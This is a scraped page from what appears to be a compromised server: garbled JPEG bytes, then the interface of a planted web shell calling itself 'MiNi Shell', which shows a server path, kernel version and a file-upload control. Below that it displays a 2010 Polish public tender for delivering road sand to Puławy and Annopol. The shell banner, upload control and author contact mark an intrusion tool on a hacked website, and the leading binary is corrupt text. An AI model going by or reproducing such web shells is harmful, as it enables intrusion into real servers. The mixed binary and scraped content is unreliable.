JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100525/134133-N-2010.html

<p class="kh_header"><b>Puławy: Dostawa  piasku do bieżącego i zimowego utrzymania dróg wraz                                        
z  rozładunkiem do siedzib Obwodów Drogowych: 
-	m. Puławy ul. Dęblińska 29 w ilości - 1 700 ton,
-	m. Annopol  ul. S. Skały 24 w ilości - 1 700 ton,</b><br>
<b>Numer ogłoszenia: 134133 - 2010; data zamieszczenia: 25.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie - Rejon Dróg Wojewódzkich w Puławach , ul. Składowa 1A, 24-100 Puławy, woj. lubelskie, tel. 081 8863163, 8864103, faks 081 8863163.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  piasku do bieżącego i zimowego utrzymania dróg wraz                                        
z  rozładunkiem do siedzib Obwodów Drogowych: 
-	m. Puławy ul. Dęblińska 29 w ilości - 1 700 ton,
-	m. Annopol  ul. S. Skały 24 w ilości - 1 700 ton,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : 
Dostawa  piasku do bieżącego i zimowego utrzymania dróg wraz                                        
z  rozładunkiem do siedzib Obwodów Drogowych: 
-	m. Puławy ul. Dęblińska 29 w ilości - 1 700 ton,
-	m. Annopol  ul. S. Skały 24 w ilości - 1 700 ton,
Zadanie nr 1: 
Dostawa piasku do bieżącego i zimowego utrzymania dróg wraz  z rozładunkiem                           do siedziby  Obwodu Drogowego w Puławach - ul. Dęblińska 29 w ilości  1 700 ton

Zadanie nr 2: 
Dostawa piasku  do bieżącego i zimowego utrzymania dróg wraz  z rozładunkiem                           do siedziby Obwodu Drogowego w Annopolu - ul. St. Skały 24  w ilości  1 700 ton

1.    Materiał będący przedmiotem przetargu tj. piasek musi:
       a) odpowiadać warunkom stawianym przez  następujące normy:   PN-EN 13242:2004;  
           PN-EN 13043:2004,
       b) warunkom określonym  w Rozporządzeniu Ministra Środowiska z dnia                                  
           27 października 2005r (Dz.U. Nr 230 poz. 1960 z 2005r) w sprawie rodzajów                             
           i warunków stosowania środków, jakie mogą być używane na drogach publicznych  
           oraz ulicach i placach, 
       c) posiadać uziarnienie od 0 do 2 mm, nie powinien być zbyt łamliwy, nie może  
           zawierać  zanieczyszczeń ilastych i gliniastych. Zawartość ziaren drobnych                            
           (< 0,075 mm)  powinna być minimalna ( maximum  do 3 %). Ziarna nie mogą być  
           spłaszczone i muszą mieć kształt regularny. Materiał powinien wykazywać 
   
           dostateczną wytrzymałość na mechaniczne ich niszczenie przez ruch (nie mogą  
           ulegać rozdrabnianiu). Nie powinny zawierać zanieczyszczeń mogących wzmagać  
           korozję pojazdów i konstrukcji stalowych.
2.    Na potwierdzenie spełnienia w/w warunków, Wykonawca załączy do oferty wyniki  
       badań oferowanego piasku (świadectwo zgodności oraz analizę sitową kruszywa),   
       przeprowadzone na własny koszt  w Laboratorium Drogowym (wykonane nie wcześniej  
       niż 8 tygodni przed upływem terminu składania ofert), które będą podstawą do  
       przyjęcia lub odrzucenia oferty. 
3.    Dostawy będą realizowane sukcesywnie, w miarę potrzeb Zamawiającego,                               
       w ilościach zamawianych telefonicznie przez upoważnionych pracowników.                                         
       O potrzebie dostawy Wykonawca będzie informowany co najmniej na 3 dni przed 
       planowanym terminem dostawy.
4.    W przypadku zakwestionowania partii dostawy, Zamawiający przy udziale  
       przedstawiciela Wykonawcy, będzie pobierał 2 próbki dostarczonego piasku o masie                 
       6 kg każda, po jednej dla każdej ze stron oraz sporządzi protokół z dostawy. Połowa  
       piasku z próbki pozostającej u Zamawiającego zostanie przekazana do zbadania                             
       w Laboratorium Drogowym celem sprawdzenia jego zgodności z normami i przepisami         
       a druga połowa pozostawiona będzie u Kierownika Obwodu Drogowego do czasu  
       otrzymania wyników badań.
5.    W przypadku wyników badań potwierdzających nie spełnienie w/w warunków, za  
       zakwestionowaną ilość i transport dostarczonego materiału Zamawiający nie zapłaci  
       wystawionej faktury, a sam materiał pozostawi do dyspozycji Wykonawcy, który                            
       w terminie 7 dni, na własny koszt zabierze go z placu składowego Zamawiającego                       
       i dostarczy materiał właściwej jakości. 
6.    Dostarczenie trzech partii piasku nie spełniającego w/w wymogów może spowodować 
       wypowiedzenie umowy przez Zamawiającego w terminie natychmiastowym.
7.    Wykonawca otrzyma wynagrodzenie za faktyczne ilości dostarczonego materiału.     
8.    Zamawiający dopuszcza możliwość składania ofert częściowych na pojedyncze  
       Zadania. Wykonawca może złożyć ofertę na wykonanie jednego lub obu zadań,  
       wybranych przez siebie spośród zadań wyszczególnionych w pkt. III.
9.    Zgodnie z art. 30 ust. 4 ustawy, Zamawiający dopuszcza rozwiązania równoważne  
   opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym    
   przez Zamawiającego jest obowiązany wykazać, że oferowane materiały  spełniają  
   wymagania określone przez Zamawiającego (art. 30, ust. 5 ustawy PZP).
Wartość szacunkowa zamówienia: 58 603,18 zł netto..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 14.21.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku posiadania wiedzy  i doświadczenia Wykonawca winien wykonać (a w przypadku świadczeń okresowych lub ciągłych również wykonywać)  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 
krótszy - w tym okresie, minimum 2 dostaw piasku o wartości min. 25.000,00 zł na jedno zadanie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Na potwierdzenie spełnienia w/w warunków, Wykonawca załączy do oferty wyniki  
       badań oferowanego piasku (świadectwo zgodności oraz analizę sitową kruszywa),   
       przeprowadzone na własny koszt  w Laboratorium Drogowym (wykonane nie wcześniej  
       niż 8 tygodni przed upływem terminu składania ofert), które będą podstawą do  
       przyjęcia lub odrzucenia oferty.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Ofertę przetargową - z ceną netto i z podatkiem VAT  wraz                               z Formularzem Cenowym . 
2)	W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia 
     albo reprezentowania w postępowaniu i zawarcia umowy    w sprawie zamówienia   
     publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
3)	W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie są wymienione w odpisie z właściwego rejestru albo zaświadczeniu o wpisie do ewidencji działalności gospodarczej, do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/zdw<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> RDW w Puławach ul. Składowa 1a pok. nr 11 lub za zaliczeniem pocztowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2010 godzina 08:00, miejsce: Rejon Dróg Wojewódzkich w Puławach ul. Składowa 1a pok. nr 12.
Otwarcie ofert w dniu 09 czerwca 2010 r. o godz. 08.30 pok. nr 11..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający 
i Wykonawcy przekazują pisemnie,  faksem lub drogą elektroniczną. 
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron                     na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
Osoby uprawnione do porozumiewania się z wykonawcami. 
1.  W sprawach technicznych -  inż. Tomasz Kwiatkowski, tel. ( 81) 886-31-63
2.  W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - inż. Ewa Pachla, tel. (81) 886-31-63.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1: 
Dostawa piasku do bieżącego i zimowego utrzymania dróg wraz  z rozładunkiem                           do siedziby  Obwodu Drogowego w Puławach - ul. Dęblińska 29 w ilości  1 700 ton.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.    Materiał będący przedmiotem przetargu tj. piasek musi:
       a) odpowiadać warunkom stawianym przez  następujące normy:   PN-EN 13242:2004;  
           PN-EN 13043:2004,
       b) warunkom określonym  w Rozporządzeniu Ministra Środowiska z dnia                                  
           27 października 2005r (Dz.U. Nr 230 poz. 1960 z 2005r) w sprawie rodzajów                             
           i warunków stosowania środków, jakie mogą być używane na drogach publicznych  
           oraz ulicach i placach, 
       c) posiadać uziarnienie od 0 do 2 mm, nie powinien być zbyt łamliwy, nie może  
           zawierać  zanieczyszczeń ilastych i gliniastych. Zawartość ziaren drobnych                            
           (< 0,075 mm)  powinna być minimalna ( maximum  do 3 %). Ziarna nie mogą być  
           spłaszczone i muszą mieć kształt regularny. Materiał powinien wykazywać 
           dostateczną wytrzymałość na mechaniczne ich niszczenie przez ruch (nie mogą  
           ulegać rozdrabnianiu). Nie powinny zawierać zanieczyszczeń mogących wzmagać  
           korozję pojazdów i konstrukcji stalowych.
Wartość szacunkowa zadania:22 715,07 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 14.21.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2: 
Dostawa piasku  do bieżącego i zimowego utrzymania dróg wraz  z rozładunkiem                           do siedziby Obwodu Drogowego w Annopolu - ul. St. Skały 24  w ilości  1 700 ton.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.    Materiał będący przedmiotem przetargu tj. piasek musi:
       a) odpowiadać warunkom stawianym przez  następujące normy:   PN-EN 13242:2004;  
           PN-EN 13043:2004,
       b) warunkom określonym  w Rozporządzeniu Ministra Środowiska z dnia                                  
           27 października 2005r (Dz.U. Nr 230 poz. 1960 z 2005r) w sprawie rodzajów                             
           i warunków stosowania środków, jakie mogą być używane na drogach publicznych  
           oraz ulicach i placach, 
       c) posiadać uziarnienie od 0 do 2 mm, nie powinien być zbyt łamliwy, nie może  
           zawierać  zanieczyszczeń ilastych i gliniastych. Zawartość ziaren drobnych                            
           (< 0,075 mm)  powinna być minimalna ( maximum  do 3 %). Ziarna nie mogą być  
           spłaszczone i muszą mieć kształt regularny. Materiał powinien wykazywać 
           dostateczną wytrzymałość na mechaniczne ich niszczenie przez ruch (nie mogą  
           ulegać rozdrabnianiu). Nie powinny zawierać zanieczyszczeń mogących wzmagać  
           korozję pojazdów i konstrukcji stalowych.
Szacunkowa wartość zadania: 35 888,11 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.21.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com